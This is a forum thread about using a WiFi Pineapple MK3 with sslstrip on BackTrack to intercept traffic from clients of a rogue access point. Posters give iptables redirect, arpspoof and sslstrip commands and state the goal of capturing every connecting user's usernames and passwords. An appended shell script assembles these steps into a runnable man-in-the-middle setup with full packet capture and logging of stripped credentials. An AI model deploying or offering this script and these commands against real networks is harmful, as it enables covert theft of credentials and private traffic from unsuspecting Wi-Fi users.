
Sslstrip Dsniff Using Mk3 (v1.9) On Bt5r1



G'day Gents (& Gals?),

Now that most of us have figured out how to flash and set up our MK3s, I'd like to start a discussion thread about what can be achieved next.

Can one of the experts here provide some insight for how to route tools like SSLSTRIP + DSNIFF on the host OS (ex. BT5R1); a few have pointed out that there are storage limitations for logging data with tools that are built into the MK3 interface, such as, ngrep.

Also, because we are already the MITM with the MK3, do we need to change iptables & use arpspoof? I don't want to bork the ./wp3.sh config for the MK3 by messing with routing, etc., when trying to configure SSLSTRIP.

This tool is awesome guys, really fun stuff... Thanks :)

Diggs


Have you looked at the wp3 script?

It will take you through all the steps needed to get internet sharing and routing set up in BackTrack.

From that point SSL strip is set up just as has been described many times, and since it will be running on your laptop you won't have the space limitations of the pineapple.

If you're interested I can post up the script I use with my pineapples. It's a little more work to get working, but it has tcpdump to log all packets for offline mining, SSL strip, and also takes care of the IP forwarding and internet sharing in BT5 R1.


Definitely would be interesting to see the script you use.

wp3.sh seems to create the necessary allow-IP-forward rule (from 0 to 1). I found I was able to get ssl strip to work (which I'm completely new to) by doing the following:

- enable wifi pineapple (flashed to v1.9) & activate karma
- enable iptables: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
- enable arpspoof: arpspoof -i eth1 172.16.42.178 172.16.42.1
- enable sslstrip: chmod +x sslstrip.py --> ./sslstrip.py -l 8080


haha! freakin' awesome -- you guys rock!

Mr-Protocol: how would that be possible? Can you explain the logic at all? What doesn't make sense to me is that I was trying to get ettercap to work earlier for the same reason. I wanted to automate and make the setup easier but ultimately I couldn't automate SSLSTRIP as much as I wanted because you have to select a client and host IP for ARPSPOOF.

The "BIG" technical question in my head is: can SSLSTRIP be run against the AP and all traffic instead of individual clients? So it will literally create a net and capture all U/P for clients that connect to the MK3.

Thoughts?

I was debating editing the wp3.sh to ask if you want to start SSL Strip and throw an exception if it isn't installed and working. But soon it may be implemented into the pineapple by forms of magic... MAYBE

Edited by diggler


SSL strip will run against ALL clients since you will be running it on the laptop against the Ethernet interface connected to your pineapple. And like we said no arpspoof required =)


A lil tipsy right now, but basically what happens is an iptables entry is made to forward all SSL traffic (port) to the SSLStrip listener, which SSLStrip forwards on and does its magic. So it would work on all clients, not on an individual basis. It's basically just a simplified proxy in the middle of the connection, almost like privoxy.

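The steps in diggler's list and the redirect Mr-Protocol describes, put together as one script. This is an added example written for this page; it is not wp3.sh and not the script any poster offered to share. It assumes the Pineapple hangs off eth1, the Internet uplink is wlan0 and sslstrip listens on 8080 (all three are variables at the top), and the `--apply` flag and the function names `build_rules`, `require_tools`, `strip_https_links` and `apply_rules` are its own. Because the laptop is already the clients' default gateway, the only rule beyond what internet sharing needs is the PREROUTING REDIRECT on the Pineapple-facing interface, so no arpspoof is involved. `strip_https_links` is a grep/sed sketch, over a constructed HTML snippet, of the rewrite sslstrip itself performs on each proxied response, to show why that single redirect catches every client.

```shell
#!/bin/sh
# Added example (not wp3.sh): laptop as gateway for Pineapple clients,
# with their HTTP transparently redirected into sslstrip on this box.
# Interface names and port are assumptions; adjust to what wp3.sh used.

PINEAPPLE_IF="${PINEAPPLE_IF:-eth1}"     # wired link to the Pineapple (assumed)
INTERNET_IF="${INTERNET_IF:-wlan0}"      # uplink that actually reaches the Internet (assumed)
SSLSTRIP_PORT="${SSLSTRIP_PORT:-8080}"   # passed to sslstrip -l
LOGDIR="${LOGDIR:-$HOME/pineapple-logs}" # pcap + sslstrip log live here

# Emit the iptables rules as text so they can be reviewed (or tested)
# without root. The first three give Pineapple clients Internet access;
# the last one is the only addition sslstrip needs: TCP/80 arriving from
# the Pineapple side is diverted to the local sslstrip listener. Nothing
# here touches ARP, because clients already route through this host.
build_rules() {
    local pin="$1" inet="$2" port="$3"
    printf '%s\n' \
        "iptables -t nat -A POSTROUTING -o $inet -j MASQUERADE" \
        "iptables -A FORWARD -i $pin -o $inet -j ACCEPT" \
        "iptables -A FORWARD -i $inet -o $pin -m state --state RELATED,ESTABLISHED -j ACCEPT" \
        "iptables -t nat -A PREROUTING -i $pin -p tcp --dport 80 -j REDIRECT --to-port $port"
}

# Fail early if a tool is missing (the "throw an exception if it isn't
# installed" idea from the thread). Tool names are arguments so the
# check can be exercised with fake names.
require_tools() {
    local missing=0 t
    for t in "$@"; do
        command -v "$t" >/dev/null 2>&1 || { echo "missing: $t" >&2; missing=1; }
    done
    return $missing
}

# Sketch of what sslstrip does to each response it proxies: https://
# links become http:// so the client keeps talking plaintext to us, and
# every downgraded URL is recorded so the upstream side can still be
# fetched over HTTPS. $1 is the HTML body, $2 the file that records it.
strip_https_links() {
    local html="$1" stripped_file="$2"
    printf '%s\n' "$html" | grep -o 'https://[^"'"'"' <>]*' >>"$stripped_file" || true
    printf '%s\n' "$html" | sed 's#https://#http://#g'
}

# Turn on forwarding (wp3.sh flips the same 0 -> 1) and load the rules.
apply_rules() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root to apply rules" >&2; return 1; }
    echo 1 > /proc/sys/net/ipv4/ip_forward
    build_rules "$PINEAPPLE_IF" "$INTERNET_IF" "$SSLSTRIP_PORT" | while read -r rule; do
        $rule
    done
}

main() {
    require_tools iptables sslstrip tcpdump || exit 1
    mkdir -p "$LOGDIR"
    apply_rules || exit 1
    # Full capture of the Pineapple link for offline mining on the laptop's disk
    tcpdump -i "$PINEAPPLE_IF" -s 0 -w "$LOGDIR/pineapple-$(date +%F-%H%M).pcap" &
    # sslstrip listens on the redirect port and logs stripped posts to its own file
    sslstrip -l "$SSLSTRIP_PORT" -w "$LOGDIR/sslstrip.log"
}

# Only run the procedure when asked, so the functions can be sourced and tested
case "${1:-}" in
    --apply) main ;;
esac
```

Run it as `sudo ./pineapple-sslstrip.sh --apply` once wp3.sh has brought the Pineapple link up. One caveat worth keeping in mind: the redirect only ever sees connections that start as plaintext HTTP on port 80. A client that goes straight to an https:// URL, or a site the browser already knows to reach only over HTTPS (HSTS), never passes through port 80 and sslstrip gets nothing from it.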
